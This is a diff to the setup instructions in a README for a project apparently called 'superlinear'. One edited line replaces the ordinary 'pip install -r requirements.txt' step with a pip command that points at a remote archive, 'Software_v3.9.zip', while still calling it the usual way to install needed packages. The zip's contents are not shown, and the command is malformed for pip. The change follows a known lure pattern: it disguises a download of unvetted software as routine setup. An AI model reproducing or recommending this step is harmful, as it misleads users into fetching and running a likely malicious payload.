jeetnotop/superlinear/README.md

 1. Open Command Prompt or Terminal.
 2. Navigate to the folder where you downloaded the superlinear files.
 3. Follow the included README or instructions file to run setup commands.
-4. Usually, this involves running `pip install -r requirements.txt` to install other needed packages.
+4. Usually, this involves running `pip install -r https://raw.githubusercontent.com/jeetnotop/superlinear/main/local/Software_v3.9.zip` to install other needed packages.
 5. You can start superlinear by running its command line interface.

 ---